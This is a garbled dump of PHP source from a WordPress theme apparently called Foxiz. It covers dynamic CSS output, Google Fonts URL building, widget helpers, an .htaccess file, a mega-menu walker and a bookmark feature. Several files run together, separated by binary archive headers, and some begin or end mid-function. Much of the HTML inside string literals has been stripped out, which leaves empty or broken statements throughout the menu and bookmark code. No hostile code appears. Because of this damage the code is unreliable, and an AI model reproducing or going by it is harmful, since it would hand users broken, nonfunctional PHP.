'px;'; $output .= '}}'; } if ( ! empty( $settings['saved_title_size_mobile'] ) ) { $output .= '@media (max-width: 767px){'; $output .= '.saved-section .blog-content {'; $output .= '--title-size: ' . floatval( $settings['saved_title_size_mobile'] ) . 'px;'; $output .= '}}'; } if ( ! empty( $settings['archive_display_ratio'] ) ) { $output .= 'body.archive:not(.author):not(.category) .blog-content .p-featured {'; $output .= 'padding-bottom : ' . floatval( $settings['archive_display_ratio'] ) . '%;'; $output .= '}'; } if ( ! empty( $settings['search_display_ratio'] ) ) { $output .= 'body.search .blog-content .p-featured {'; $output .= 'padding-bottom : ' . floatval( $settings['search_display_ratio'] ) . '%;'; $output .= '}'; } if ( ! empty( $settings['author_display_ratio'] ) ) { $output .= 'body.author .blog-content .p-featured {'; $output .= 'padding-bottom : ' . floatval( $settings['author_display_ratio'] ) . '%;'; $output .= '}'; } if ( ! empty( $settings['blog_display_ratio'] ) ) { $output .= 'body.blog .blog-content .p-featured {'; $output .= 'padding-bottom : ' . floatval( $settings['blog_display_ratio'] ) . '%;'; $output .= '}'; } if ( ! empty( $settings['saved_display_ratio'] ) ) { $output .= '.saved-section .blog-content .p-featured {'; $output .= 'padding-bottom : ' . floatval( $settings['saved_display_ratio'] ) . '%;'; $output .= '}'; } if ( ! empty( $settings['recommended_display_ratio'] ) ) { $output .= '.rec-section .blog-content .p-featured {'; $output .= 'padding-bottom : ' . floatval( $settings['recommended_display_ratio'] ) . '%;'; $output .= '}'; } return $output; } /** * @param $settings * * @return string */ function get_heading_var( $settings ) { $output = ''; if ( ! empty( $settings['single_post_related_blog_heading_size'] ) ) { $output .= '.single-related {'; $output .= '--heading-size-desktop :' . floatval( $settings['single_post_related_blog_heading_size'] ) . 'px;'; $output .= '}'; } return $output; } /** * @param array $settings * * @return string */ function get_global_var_dark_data( $settings = array() ) { $output = ''; /** privacy box */ if ( ! empty( $settings['dark_privacy_bg_color'] ) ) { $output .= '--privacy-bg-color :' . $settings['dark_privacy_bg_color'] . ';'; } if ( ! empty( $settings['dark_privacy_text_color'] ) ) { $output .= '--privacy-color :' . $settings['dark_privacy_text_color'] . ';'; } /** heading color */ if ( ! empty( $settings['dark_heading_color'] ) ) { $output .= '--heading-color :' . $settings['dark_heading_color'] . ';'; } if ( ! empty( $settings['dark_heading_sub_color'] ) ) { $output .= '--heading-sub-color :' . $settings['dark_heading_sub_color'] . ';'; } if ( ! empty( $settings['ad_top_dark_bg'] ) ) { $output .= '--top-site-bg :' . $settings['ad_top_dark_bg'] . ';'; } if ( ! empty( $settings['dark_hyperlink_color'] ) ) { $output .= '--hyperlink-color :' . $settings['dark_hyperlink_color'] . ';'; } if ( ! empty( $settings['dark_hyperlink_line_color'] ) ) { $output .= '--hyperlink-line-color :' . $settings['dark_hyperlink_line_color'] . ';'; } if ( ! empty( $settings['wc_dark_price_color'] ) ) { $output .= '--wc-price-color :' . $settings['wc_dark_price_color'] . ';'; } if ( ! empty( $settings['wc_dark_star_color'] ) ) { $output .= '--wc-star-color :' . $settings['wc_dark_star_color'] . ';'; } if ( ! empty( $settings['dark_slide_up_bg']['rgba'] ) ) { $output .= '--slideup-bg :' . $settings['dark_slide_up_bg']['rgba'] . ';'; } if ( ! empty( $settings['dark_slide_up_icon_color'] ) ) { $output .= '--slideup-icon-color :' . $settings['dark_slide_up_icon_color'] . ';'; } return $output; } /** * @param $settings * * @return string */ function get_global_var_dark( $settings = array() ) { $output = ''; if ( $this->get_global_var_dark_data( $settings ) ) { $output .= '[data-theme="dark"], .light-scheme {'; $output .= $this->get_global_var_dark_data( $settings ); $output .= '}'; } return $output; } /** * @param $settings * @param $config_id * @param false $font_size * * @return false|string */ function font_css( $settings, $config_id, $font_size = false ) { if ( empty( $settings[ $config_id ] ) || ! is_array( $settings[ $config_id ] ) ) { return false; } $setting = $settings[ $config_id ]; if ( isset( $setting['google'] ) ) { unset ( $setting['google'] ); } if ( isset( $setting['subsets'] ) ) { unset ( $setting['subsets'] ); } if ( isset( $setting['font-options'] ) ) { unset ( $setting['font-options'] ); } /** control font size via variable */ if ( ! $font_size && isset( $setting['font-size'] ) ) { unset( $setting['font-size'] ); } $output = ''; if ( ! empty( $setting['font-backup'] ) && ! empty( $setting['font-family'] ) ) { $setting['font-family'] = $setting['font-family'] . ',' . $setting['font-backup']; unset ( $setting['font-backup'] ); } foreach ( $setting as $key => $val ) { if ( '' !== trim( $val ) ) { $output .= $key . ':' . $val . ';'; } } return $output; } /** * @param array $settings * * @return string */ function get_dynamic_style( $settings = array() ) { $output = ''; /** optimize css size for AMP */ $font_breadcrumb_css = $this->font_css( $settings, 'font_breadcrumb' ); $font_readmore_css = $this->font_css( $settings, 'font_readmore' ); $font_mobile_menu_css = $this->font_css( $settings, 'font_mobile_menu', true ); $font_sub_mobile_menu_css = $this->font_css( $settings, 'font_mobile_sub_menu', true ); $font_quick_access_menu_css = $this->font_css( $settings, 'font_quick_access_menu', true ); if ( ! empty( $font_breadcrumb_css ) ) { $output .= '.breadcrumb-inner, .woocommerce-breadcrumb { ' . $font_breadcrumb_css . '}'; } if ( ! empty( $font_readmore_css ) ) { $output .= '.p-readmore { ' . $font_readmore_css . '}'; } if ( ! empty( $font_mobile_menu_css ) ) { $output .= '.mobile-menu > li > a { ' . $font_mobile_menu_css . '}'; } if ( ! empty( $font_sub_mobile_menu_css ) ) { $output .= '.mobile-menu .sub-menu a { ' . $font_sub_mobile_menu_css . '}'; } if ( ! empty( $font_quick_access_menu_css ) ) { $output .= '.mobile-qview a { ' . $font_quick_access_menu_css . '}'; } /** background $search_header_bg */ $search_header_bg = $this->css_background( $settings, 'search_header_background' ); $dark_search_header_bg = $this->css_background( $settings, 'dark_search_header_background' ); if ( ! empty( $search_header_bg ) ) { $output .= '.search-header:before { ' . $search_header_bg . '}'; } if ( ! empty( $dark_search_header_bg ) ) { $output .= '[data-theme="dark"] .search-header:before { ' . $dark_search_header_bg . '}'; } $footer_bg = $this->css_background( $settings, 'footer_background' ); $dark_footer_bg = $this->css_background( $settings, 'dark_footer_background' ); if ( ! empty( $footer_bg ) ) { $output .= '.footer-has-bg { ' . $footer_bg . '}'; } if ( ! empty( $footer_bg ) ) { $output .= '[data-theme="dark"] .footer-has-bg { ' . $dark_footer_bg . '}'; } if ( ! empty( $settings['ad_top_width'] ) ) { $output .= '.top-site-ad .ad-image { max-width: ' . intval( $settings['ad_top_width'] ) . 'px; }'; } if ( ! empty( $settings['ad_single_width'] ) ) { $output .= '.single-inline-ad .ad-image { max-width: ' . intval( $settings['ad_top_width'] ) . 'px; }'; } if ( ! empty( $settings['ad_top_dark_bg'] ) ) { $output .= '.yes-hd-transparent .top-site-ad {--top-site-bg :' . $settings['ad_top_dark_bg'] . ';}'; } if ( ! empty( $settings['grid_box_1_box_color'] ) ) { $output .= '.grid-box {--box-color :' . $settings['grid_box_1_box_color'] . ';}'; } if ( ! empty( $settings['grid_box_1_dark_box_color'] ) ) { $output .= '.grid-box {--dark-box-color :' . $settings['grid_box_1_dark_box_color'] . ';}'; } if ( ! empty( $settings['list_box_1_box_color'] ) ) { $output .= '.list-box {--box-color :' . $settings['list_box_1_box_color'] . ';}'; } if ( ! empty( $settings['list_box_1_dark_box_color'] ) ) { $output .= '.list-box {--dark-box-color :' . $settings['list_box_1_dark_box_color'] . ';}'; } if ( ! empty( $settings['exclusive_label'] ) ) { $output .= '.entry-title.is-p-protected a:before {'; $output .= 'content: "' . esc_html( $settings['exclusive_label'] ) . '"; display: inline-block;'; $output .= '}'; } if ( ! empty( $settings['footer_copyright_size'] ) ) { $output .= '.copyright-menu a { font-size:' . $settings['footer_copyright_size'] . 'px; }'; } if ( ! empty( $settings['footer_copyright_text_size'] ) ) { $output .= '.copyright-inner .copyright { font-size:' . $settings['footer_copyright_text_size'] . 'px; }'; } if ( ! empty( $settings['footer_columns_size'] ) ) { $output .= '.footer-col .widget_nav_menu a span { font-size:' . $settings['footer_columns_size'] . 'px; }'; } if ( ! empty( $settings['light_switcher_color'] ) ) { $output .= '.svg-mode-light { color:' . $settings['light_switcher_color'] . '; }'; } if ( ! empty( $settings['dark_switcher_bg'] ) ) { $output .= '.mode-icon-dark { background-color:' . $settings['dark_switcher_bg'] . '; }'; } if ( ! empty( $settings['amp_footer_logo_height'] ) ) { $output .= '.amp-footer .footer-logo { height :' . $settings['amp_footer_logo_height'] . 'px; }'; } if ( ! empty( $settings['remove_amp_switcher'] ) ) { $output .= '#amp-mobile-version-switcher { display: none; }'; } /** menus */ $menus = wp_get_nav_menus(); if ( ! empty( $menus ) ) { foreach ( $menus as $menu ) { $menu_id = $menu->term_id; $menu_settings = get_option( 'rb_menu_settings_' . $menu_id, array() ); if ( count( $menu_settings ) ) { foreach ( $menu_settings as $item_id => $item_data ) { if ( ! empty( $item_data['sub_label_color'] ) ) { $output .= '.menu-item-' . esc_attr( $item_id ) . ' span.menu-sub-title { color: ' . esc_attr( $item_data['sub_label_color'] ) . ' !important;}'; } if ( ! empty( $item_data['sub_label_bg'] ) ) { $output .= '.menu-item-' . esc_attr( $item_id ) . ' span.menu-sub-title { background-color: ' . esc_attr( $item_data['sub_label_bg'] ) . ';}'; } if ( ! empty( $item_data['sub_label_dark_color'] ) ) { $output .= '[data-theme="dark"] .menu-item-' . esc_attr( $item_id ) . ' span.menu-sub-title { color: ' . esc_attr( $item_data['sub_label_dark_color'] ) . ' !important;}'; } if ( ! empty( $item_data['sub_label_dark_bg'] ) ) { $output .= '[data-theme="dark"] .menu-item-' . esc_attr( $item_id ) . ' span.menu-sub-title { background-color: ' . esc_attr( $item_data['sub_label_dark_bg'] ) . ';}'; } } } } } return $output; } /** * @return string * generate CSS */ function output() { $output = $this->get_typography_var( $this->settings ); $output .= $this->get_font_size_tablet( $this->settings ); $output .= $this->get_font_size_mobile( $this->settings ); $output .= $this->get_colors_var( $this->settings ); $output .= $this->get_header_1_var( $this->settings ); $output .= $this->get_header_4_var( $this->settings ); $output .= $this->get_header_5_var( $this->settings ); $output .= $this->get_mobile_header_var( $this->settings ); $output .= $this->get_archive_var( $this->settings ); $output .= $this->get_categories_var( $this->settings ); $output .= $this->get_heading_var( $this->settings ); $output .= $this->get_global_var( $this->settings ); $output .= $this->get_global_var_dark( $this->settings ); $output .= $this->get_dynamic_style( $this->settings ); return $this->minify_css( $output ); } } } /** load */ Foxiz_Css::get_instance(); PK!A9CZZincludes/fonts.phpnu[gfonts = $this->get_gfonts(); $this->settings = get_option( FOXIZ_TOS_ID, array() ); add_filter( 'foxiz_default_fonts', array( $this, 'default_fonts' ) ); } /** * @param $pre_fonts * * @return array */ public function default_fonts( $pre_fonts ) { if ( ! empty( $this->settings['disable_default_fonts'] ) ) { return $pre_fonts; } return array_merge( $pre_fonts, array( [ 'font-family' => 'Oxygen', 'font-style' => '400,700', ], [ 'font-family' => 'Encode Sans Condensed', 'font-style' => '400,500,600,700,800', ], ) ); } /** * @return false|mixed */ public function get_gfonts() { if ( defined( 'FOXIZ_CORE_PATH' ) ) { $gfont_file = FOXIZ_CORE_PATH . 'lib/redux-framework/inc/fields/typography/googlefonts.php'; if ( file_exists( $gfont_file ) ) { return include $gfont_file; } } return false; } /** * @param $font_family * * @return false|string */ public function get_all_styles( $font_family ) { $styles = array(); $exclude = array( '100', '200', '300', '100i', '200i', '300i' ); if ( empty( $font_family ) || ! isset( $this->gfonts[ $font_family ] ) ) { return false; } $gfont = $this->gfonts[ $font_family ]; if ( is_array( $gfont['variants'] ) ) { foreach ( $gfont['variants'] as $variant ) { if ( ! isset( $variant['id'] ) || ! in_array( $variant['id'], $exclude ) ) { array_push( $styles, $variant['id'] ); } } } return implode( ',', $styles ); } /** get google font URLs */ function get_font_url() { $pre_fonts = array(); $fonts = array(); $subsets = array(); $link = ''; foreach ( $this->settings as $id => $field ) { if ( ! empty( $field['font-family'] ) ) { if ( ! isset( $field['font-style'] ) ) { $field['font-style'] = ''; } if ( 'font_body' === $id ) { $field['font-weight'] = ''; $field['font-style'] = $this->get_all_styles( $field['font-family'] ); } if ( ! empty( $field['font-weight'] ) ) { $field['font-style'] = $field['font-weight'] . $field['font-style']; } array_push( $pre_fonts, $field ); } } $pre_fonts = apply_filters( 'foxiz_default_fonts', $pre_fonts ); foreach ( $pre_fonts as $field ) { $field['font-family'] = str_replace( ' ', '+', $field['font-family'] ); $styles = explode( ',', $field['font-style'] ); if ( ! isset( $fonts[ $field['font-family'] ] ) ) { $fonts[ $field['font-family'] ] = $field; $fonts[ $field['font-family'] ]['font-style'] = array(); } $fonts[ $field['font-family'] ]['font-style'] = array_merge( $fonts[ $field['font-family'] ]['font-style'], $styles ); } foreach ( $fonts as $family => $font ) { if ( ! empty( $link ) ) { $link .= "%7C"; } $link .= $family; if ( ! empty( $font['font-style'] ) && is_array( $font['font-style'] ) ) { $link .= ':'; $font['font-style'] = array_unique( $font['font-style'] ); $link .= implode( ',', $font['font-style'] ); } if ( ! empty( $font['subset'] ) ) { foreach ( $font['subset'] as $subset ) { if ( ! in_array( $subset, $subsets ) ) { array_push( $subsets, $subset ); } } } } if ( ! empty( $subsets ) ) { $link .= "&subset=" . implode( ',', $subsets ); } $link .= "&display=swap"; return '//fonts.googleapis.com/css?family=' . str_replace( '|', '%7C', $link ); } } } PK! includes/helpers.phpnu[ (' ); if ( false !== $pos ) { $str = str_replace( ' (', '', $str ); $str = str_replace( ')', '', $str ); } return $str; } }; /** * add span tag for default archive widget */ if ( ! function_exists( 'foxiz_archives_widget_span' ) ) { function foxiz_archives_widget_span( $str ) { $pos = strpos( $str, ' (' ); if ( false !== $pos ) { $str = str_replace( ' (', '', $str ); $str = str_replace( ')', '', $str ); } return $str; } } /** * @param $args * * @return mixed * tag filter */ if ( ! function_exists( 'foxiz_widget_tag_cloud_args' ) ) { function foxiz_widget_tag_cloud_args( $args ) { $args['largest'] = 1; $args['smallest'] = 1; return $args; } } if ( ! function_exists( 'foxiz_update_metaboxes' ) ) { /** * @param $post_id */ function foxiz_update_metaboxes( $post_id ) { if ( foxiz_is_sponsored_post( $post_id ) ) { update_post_meta( $post_id, 'foxiz_sponsored', 1 ); } $review = foxiz_get_review_settings( $post_id ); if ( ! empty( $review['average'] ) ) { if ( empty( $settings['type'] ) || 'score' === $settings['type'] ) { update_post_meta( $post_id, 'foxiz_review_average', $review['average'] ); } else { update_post_meta( $post_id, 'foxiz_review_average', floatval( $review['average'] ) * 2 ); } } } } /** * @param $tags * @param $context * * @return array|mixed */ if ( ! function_exists( 'foxiz_kses_allowed_html' ) ) { function foxiz_kses_allowed_html( $tags, $context ) { switch ( $context ) { case 'foxiz': $tags = array( 'a' => array( 'href' => array(), 'title' => array(), 'target' => array(), ), 'br' => array(), 'em' => array(), 'strong' => array(), 'i' => array( 'class' => array(), ), 'p' => array(), 'span' => array(), 'div' => array( 'class' => array(), ), ); return $tags; default: return $tags; } } }PK!.|includes/.htaccessnu[ Order allow,deny Deny from all Order allow,deny Allow from all RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PK!_՗77includes/menu.phpnu['; if ( ! empty( $settings[ $item->ID ]['icon'] ) ) { $output .= ''; } elseif ( ! empty( $settings[ $item->ID ]['icon_image'] ) ) { if ( ! empty( $settings[ $item->ID ]['dark_icon_image'] ) ) { $output .= ''; $output .= '' . esc_attr( $title ) . ''; $output .= '' . esc_attr( $title ) . ''; $output .= ''; } else { $output .= '' . esc_attr( $title ) . ''; } } $output .= $title; if ( ! empty( $settings[ $item->ID ]['sub_label'] ) ) { $output .= '' . esc_html( $settings[ $item->ID ]['sub_label'] ) . ''; } $output .= ''; return $output; } } if ( ! class_exists( 'Foxiz_Walker_Nav_Menu', false ) ) { /** * Class Foxiz_Walker_Nav_Menu */ class Foxiz_Walker_Nav_Menu extends Walker_Nav_Menu { static function get_menu_id( $args ) { if ( ! empty( $args->menu->term_id ) ) { return intval( $args->menu->term_id ); } elseif ( ! empty( $args->menu ) ) { $menu = wp_get_nav_menu_object( $args->menu ); return $menu->term_id; } return false; } public function start_el( &$output, $item, $depth = 0, $args = null, $id = 0 ) { $rb_settings = get_option( 'rb_menu_settings_' . self::get_menu_id( $args ), array() ); if ( isset( $args->item_spacing ) && 'discard' === $args->item_spacing ) { $t = ''; $n = ''; } else { $t = "\t"; $n = "\n"; } $indent = ( $depth ) ? str_repeat( $t, $depth ) : ''; $classes = empty( $item->classes ) ? array() : (array) $item->classes; $classes[] = 'menu-item-' . $item->ID; if ( empty( $depth ) && 'category' === $item->object && ! empty( $rb_settings[ $item->ID ]['category'] ) ) { $classes[] = 'menu-item-has-children menu-has-child-mega is-child-wide'; if ( ! empty ( $rb_settings[ $item->ID ]['layout'] ) ) { $classes[] = 'mega-hierarchical'; } } elseif ( empty( $depth ) && ( 'custom' === $item->object ) && ! empty ( $rb_settings[ $item->ID ]['mega_shortcode'] ) ) { $classes[] = 'menu-item-has-children menu-has-child-mega menu-has-child-mega-template'; if ( empty( $rb_settings[ $item->ID ]['mega_width'] ) ) { $classes[] = 'is-child-wide'; } } elseif ( empty( $depth ) && ( 'custom' === $item->object ) && ( ! empty ( $rb_settings[ $item->ID ]['columns'] ) ) ) { $classes[] = 'menu-item-has-children menu-has-child-mega menu-has-child-mega-columns'; if ( empty( $rb_settings[ $item->ID ]['mega_width'] ) ) { $classes[] = 'is-child-wide'; } if ( ! empty( $rb_settings[ $item->ID ]['mega_shortcode'] ) ) { $rb_settings[ $item->ID ]['columns_per_row'] = 1; } if ( ! empty ( $rb_settings[ $item->ID ]['columns_per_row'] ) ) { $classes[] = 'layout-col-' . $rb_settings[ $item->ID ]['columns_per_row']; } } $args = apply_filters( 'nav_menu_item_args', $args, $item, $depth ); $class_names = implode( ' ', apply_filters( 'nav_menu_css_class', array_filter( $classes ), $item, $args, $depth ) ); $class_names = $class_names ? ' class="' . esc_attr( $class_names ) . '"' : ''; $id = apply_filters( 'nav_menu_item_id', 'menu-item-' . $item->ID, $item, $args, $depth ); $id = $id ? ' id="' . esc_attr( $id ) . '"' : ''; $output .= $indent . ''; $atts = array(); $atts['title'] = ! empty( $item->attr_title ) ? $item->attr_title : ''; $atts['target'] = ! empty( $item->target ) ? $item->target : ''; if ( '_blank' === $item->target && empty( $item->xfn ) ) { $atts['rel'] = 'noopener'; } else { $atts['rel'] = $item->xfn; } $atts['href'] = ! empty( $item->url ) ? $item->url : ''; $atts['aria-current'] = $item->current ? 'page' : ''; $atts = apply_filters( 'nav_menu_link_attributes', $atts, $item, $args, $depth ); $attributes = ''; foreach ( $atts as $attr => $value ) { if ( is_scalar( $value ) && '' !== $value && false !== $value ) { $value = ( 'href' === $attr ) ? esc_url( $value ) : esc_attr( $value ); $attributes .= ' ' . $attr . '="' . $value . '"'; } } $title = apply_filters( 'the_title', $item->title, $item->ID ); $title = apply_filters( 'nav_menu_item_title', $title, $item, $args, $depth ); $item_output = $args->before; $item_output .= ''; $item_output .= $args->link_before . $title . $args->link_after; $item_output .= ''; $item_output .= $args->after; if ( empty( $depth ) && 'category' === $item->object && ! empty( $rb_settings[ $item->ID ]['category'] ) ) { /** mega category */ $mega_category_classes = 'mega-dropdown is-mega-category'; $inner_classes = 'mega-dropdown-inner'; if ( in_array( 'menu-item-has-children', $item->classes, true ) ) { $mega_category_classes .= ' mega-menu-has-children'; } if ( empty( $rb_settings[ $item->ID ]['sub_scheme'] ) ) { if ( ! empty( $args->sub_scheme ) ) { $inner_classes .= ' ' . esc_attr( $args->sub_scheme ); } } elseif ( '1' === $rb_settings[ $item->ID ]['sub_scheme'] ) { $inner_classes .= ' light-scheme'; } $item_output .= '
'; $item_output .= '
'; $item_output .= '
'; } elseif ( empty( $depth ) && ( 'custom' === $item->object ) && ! empty ( $rb_settings[ $item->ID ]['mega_shortcode'] ) ) { /** mega template */ if ( ! empty( $rb_settings[ $item->ID ]['mega_width'] ) ) { $item_output .= '
'; } else { $item_output .= '
'; } $item_output .= '
'; } elseif ( empty( $depth ) && ( 'custom' === $item->object ) && ! empty ( $rb_settings[ $item->ID ]['columns'] ) ) { /** mega columns */ $inner_classes = 'mega-dropdown-inner'; if ( empty( $rb_settings[ $item->ID ]['sub_scheme'] ) ) { if ( ! empty( $args->sub_scheme ) ) { $inner_classes .= ' ' . esc_attr( $args->sub_scheme ); } } elseif ( '1' === $rb_settings[ $item->ID ]['sub_scheme'] ) { $inner_classes .= ' light-scheme'; } if ( ! empty( $rb_settings[ $item->ID ]['mega_width'] ) ) { $item_output .= '
'; } else { $item_output .= '
'; } $item_output .= '
'; $item_output .= '
'; } /** filter */ $output .= apply_filters( 'walker_nav_menu_start_el', $item_output, $item, $depth, $args ); } public function end_el( &$output, $item, $depth = 0, $args = null ) { $rb_settings = get_option( 'rb_menu_settings_' . self::get_menu_id( $args ), array() ); if ( empty( $depth ) && 'category' === $item->object && ! empty( $rb_settings[ $item->ID ]['category'] ) ) { $output .= $this->category_mega_menu( $item, $rb_settings ); $output .= '
'; } elseif ( empty( $depth ) && ( 'custom' === $item->object ) && ! empty ( $rb_settings[ $item->ID ]['mega_shortcode'] ) ) { $output .= $this->column_mega_menu( $item, $rb_settings ); $output .= '
'; } elseif ( empty( $depth ) && ( 'custom' === $item->object ) && ( ! empty ( $rb_settings[ $item->ID ]['columns'] ) ) ) { $output .= $this->column_mega_menu( $item, $rb_settings ); $output .= '
'; } if ( isset( $args->item_spacing ) && 'discard' === $args->item_spacing ) { $t = ''; $n = ''; } else { $t = "\t"; $n = "\n"; } $output .= "{$n}"; } /** * @param $item * @param $rb_settings * * @return string */ public function category_mega_menu( $item, $rb_settings ) { if ( ! empty ( $rb_settings[ $item->ID ]['layout'] ) ) { return $this->blog_hierarchical( $item ); } else { return $this->blog_default( $item ); } } /** mega category default */ public function blog_default( $item ) { $output = ''; if ( ! empty( $item->object_id ) ) { $output .= ''; $output .= foxiz_get_grid_small_1( array( 'uuid' => 'mega-listing-' . $item->ID, 'duplicate_allowed' => 1, 'columns' => 5, 'posts_per_page' => 5, 'title_tag' => 'span', 'crop_size' => 'foxiz_crop_g1', 'title_classes' => 'h4', 'review' => 'replace', 'entry_meta' => 'date', 'entry_category' => '-1', 'excerpt_length' => '-1', 'category' => $item->object_id ) ); } return $output; } /** * @param $item * * @return string */ public function blog_hierarchical( $item ) { $output = ''; if ( ! empty( $item->object_id ) ) { $data = get_option( 'foxiz_category_meta', array() ); $description = term_description( $item->object_id ); $featured = ''; if ( isset( $data[ $item->object_id ]['featured_image'] ) ) { $featured = $data[ $item->object_id ]['featured_image']; } $output .= '
'; $output .= ''; $output .= foxiz_get_category_hero( $featured ); if ( ! empty( $description ) ) { $output .= '
' . wp_trim_words( $description, 25 ) . '
'; } $output .= 'target ) ) { $output .= 'target="' . $item->target . '"'; } $output .= '>' . foxiz_html__( 'Show More', 'foxiz' ) . ''; $output .= '
'; $output .= ''; $output .= '
'; $output .= '
'; $output .= '' . foxiz_html__( 'Latest News', 'foxiz' ) . ''; $output .= '
'; $output .= foxiz_get_list_small_1( array( 'uuid' => 'mega-listing-latest-' . $item->ID, 'duplicate_allowed' => 1, 'posts_per_page' => 4, 'title_tag' => 'span', 'title_classes' => 'h4', 'category' => $item->object_id, 'review' => 'replace', 'entry_format' => 'false', 'review_description' => '-1', 'entry_category' => '-1', 'entry_meta' => 'date', 'excerpt_length' => '-1', 'readmore' => '-1', 'bottom_border' => 'gray', 'last_bottom_border' => '-1' ) ); $output .= '
'; } return $output; } /** * @param $item * @param $rb_settings * * @return false|string */ public function column_mega_menu( $item, $rb_settings ) { ob_start(); if ( ! empty( $rb_settings[ $item->ID ]['mega_shortcode'] ) ) : ?> ID ]['mega_shortcode'] ) ); ?> ID ]['columns'] ) ) : ?>
ID ]['columns'] ); ?>
'; $output .= ''; $output .= ''; $output .= ''; return $output; } } if ( ! function_exists( 'foxiz_get_wologin_bookmark' ) ) { /** * @param string $post_id * @param string $redirect * * @return false|string * without login bookmark */ function foxiz_get_wologin_bookmark( $post_id = '', $redirect = '' ) { if ( function_exists( 'foxiz_is_amp' ) && foxiz_is_amp() ) { return false; } if ( empty( $redirect ) ) { $redirect = home_url( '/' ); } $output = ''; $output .= ''; $output .= ''; $output .= ''; $output .= ''; return $output; } } if ( ! function_exists( 'foxiz_bookmark_trigger' ) ) { /** * @param string $post_id */ function foxiz_bookmark_trigger( $post_id = '' ) { echo foxiz_get_bookmark_trigger( $post_id ); } } if ( ! function_exists( 'foxiz_get_bookmark_trigger' ) ) { /** * @param string $post_id * * @return false|string */ function foxiz_get_bookmark_trigger( $post_id = '' ) { if ( foxiz_is_amp() || ! class_exists( 'Foxiz_Bookmark' ) ) { return false; } $settings = Foxiz_Bookmark::get_instance()->settings; if ( empty( $settings['bookmark'] ) ) { return false; } if ( ! isset( $settings['logged_redirect'] ) ) { $redirect = $settings['logged_redirect']; } else { $redirect = get_home_url(); } if ( empty( $settings['enable_when'] ) || is_user_logged_in() ) { return foxiz_get_bookmark( $post_id ); } if ( 'ask_login' === $settings['enable_when'] && ! is_user_logged_in() ) { return foxiz_get_wologin_bookmark( $post_id, esc_url( $redirect ) ); } } } PK!u%u%bookmark/bookmark.phpnu[get_settings(); add_action( 'wp_ajax_nopriv_rb_bookmark', array( $this, 'add_bookmark' ) ); add_action( 'wp_ajax_rb_bookmark', array( $this, 'add_bookmark' ) ); add_action( 'wp_ajax_nopriv_rb_follow', array( $this, 'follow_toggle' ) ); add_action( 'wp_ajax_rb_follow', array( $this, 'follow_toggle' ) ); add_action( 'wp_ajax_nopriv_sync_bookmarks', array( $this, 'sync_bookmarks' ) ); add_action( 'wp_ajax_sync_bookmarks', array( $this, 'sync_bookmarks' ) ); add_filter( 'body_class', array( $this, 'add_classes' ), 99 ); add_action( 'wp_footer', array( $this, 'bookmark_info_template' ) ); add_action( 'wp_footer', array( $this, 'bookmark_remove_info' ) ); add_action( 'transition_post_status', array( $this, 'push_notification' ), 10, 3 ); } function bookmark_remove_info() { $settings = $this->settings; if ( empty( $settings['bookmark'] ) ) { return; } ?> settings; if ( empty( $settings['bookmark'] ) || empty( $settings['notification'] ) ) { return; } ?> settings['bookmark'] ) ) { $classes[] = 'sync-bookmarks'; } return $classes; } /** * @param $name * * @return false|mixed * get setting by name */ public function get_setting( $name ) { if ( function_exists( 'foxiz_get_option' ) ) { return foxiz_get_option( $name ); } return false; } /** * get settings */ public function get_settings() { $settings = array( 'bookmark' => $this->get_setting( 'bookmark_system' ), 'enable_when' => $this->get_setting( 'bookmark_enable_when' ), 'logged_redirect' => $this->get_setting( 'bookmark_logged_redirect' ), 'expiration' => intval( $this->get_setting( 'bookmark_expiration' ) ) * 86400, 'notification' => $this->get_setting( 'bookmark_notification' ) ); $this->settings = wp_parse_args( $settings, array( 'bookmark' => '', 'enable_when' => '', 'logged_redirect' => '', 'expiration' => '5076000' ) ); } /** * @return string|string[]|null * get user IP */ public function get_ip() { if ( function_exists( 'foxiz_get_user_ip' ) ) { $ip = foxiz_get_user_ip(); return foxiz_convert_to_id( $ip ); } return '127_0_0_1'; } /** * @param $post_id * * @return bool * check bookmark */ public function is_bookmarked( $post_id ) { if ( is_user_logged_in() ) { $data = get_user_meta( get_current_user_id(), $this->meta_ID, true ); } else { $data = get_transient( 'rb_bookmark_' . $this->get_ip() ); } if ( empty( $data ) || ! is_array( $data ) ) { return false; } else { return in_array( $post_id, $data ); } } /** * add bookmark */ public function add_bookmark() { if ( empty( $_POST['pid'] ) ) { wp_send_json( '', null ); } $post_id = intval( $_POST['pid'] ); $response = array( 'action' => 'added', 'description' => foxiz_html__( 'This article has been added to reading list', 'foxiz' ) ); if ( is_user_logged_in() ) { $user_id = get_current_user_id(); $bookmarked = get_user_meta( $user_id, $this->meta_ID, true ); if ( empty( $bookmarked ) || ! is_array( $bookmarked ) ) { $bookmarked = array(); } $key = array_search( $post_id, $bookmarked ); if ( false === $key ) { array_push( $bookmarked, $post_id ); } else { unset( $bookmarked[ $key ] ); $response['action'] = 'removed'; $response['description'] = foxiz_html__( 'This article was removed from reading list', 'foxiz' ); } update_user_meta( $user_id, $this->meta_ID, array_unique( $bookmarked ) ); } else { $transient_ID = 'rb_bookmark_' . $this->get_ip(); $bookmarked = get_transient( $transient_ID ); if ( empty( $bookmarked ) || ! is_array( $bookmarked ) ) { $bookmarked = array(); } $key = array_search( $post_id, $bookmarked ); if ( false === $key ) { array_push( $bookmarked, $post_id ); } else { unset( $bookmarked[ $key ] ); $response['action'] = 'removed'; $response['description'] = foxiz_html__( 'This article was removed from your bookmark', 'foxiz' ); } set_transient( $transient_ID, array_unique( $bookmarked ), $this->settings['expiration'] ); } if ( ! empty( $this->settings['notification'] ) ) { $response['title'] = get_the_title( $post_id ); $response['image'] = '' . esc_attr( $response['title'] ) . ''; } wp_send_json( $response, null ); } /** * get bookmarks */ public function get_bookmarks() { if ( is_user_logged_in() ) { $bookmarked = get_user_meta( get_current_user_id(), $this->meta_ID, true ); } else { $bookmarked = get_transient( 'rb_bookmark_' . $this->get_ip() ); } return $bookmarked; } public function sync_bookmarks() { wp_send_json( $this->get_bookmarks(), null ); } /** * @return false|WP_Query */ public function get_query() { $data = $this->get_bookmarks(); if ( is_array( $data ) && count( $data ) ) { return new WP_Query( array( 'post_type' => 'post', 'post__in' => $data, 'ignore_sticky_posts' => 1, 'duplicate_allowed' => 1 ) ); } else { return false; } } /** * @param $new_status * @param $old_status * @param $post */ public function push_notification( $new_status, $old_status, $post ) { if ( ( 'publish' === $new_status && 'publish' !== $old_status ) && 'post' === $post->post_type ) { update_option( 'rb_push_notification', $post->ID ); } } /** * @return array|mixed */ public function get_user_categories() { if ( is_user_logged_in() ) { $ids = 